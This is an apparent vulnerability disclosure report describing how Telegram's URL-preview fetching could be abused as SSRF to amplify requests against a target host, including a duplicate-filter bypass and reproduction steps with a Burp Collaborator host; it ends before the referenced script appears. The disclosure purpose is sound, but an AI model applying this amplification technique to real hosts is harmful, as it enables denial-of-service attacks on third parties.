Telegram Report: SSRF leads to DOS attack [Reports that didn't make it]

Summary

When a Telegram user (or bot) sends a message containing an URL to another user, the Telegram Bot sends a request to check the URL. This is a privacy issue in my view, because URLs and some parts of your conversations are being read by a machine, the end-to-end encryption is not enforced in this case. We also detect that if (by mistake) you append text to the URLs that text will be send to the bot as well.

We discovered this issue when I accidentally send a Burp Collaborator link to a collage and I received a HTTP and DNS on my client.

But, besides the privacy concern, what if we could use this behavior to send many requests to a target host?

I used a python script to send messages to a Telegram bot, every message contains 70 URLs that are actually the same domain with a different path. I discovered that a filter was not allowing to repeat the URLS, but I only needed to add something in the end to bypass it.

I’m aware of the size limit of every message and also the rate limit to send messages to the bot, around 100 is the upper limit.

Steps To Reproduce

1. Create a Telegram bot.
2. Configure [this tool](https://github.com/MikeWent/notify-send-telegram) to send messages the bot.
3. Fire-up Burp and get Collaborator payload. (In this example is ucaao50j385xwc1hc3on5z9w1n7fv4.burpcollaborator.net)
4. Use this script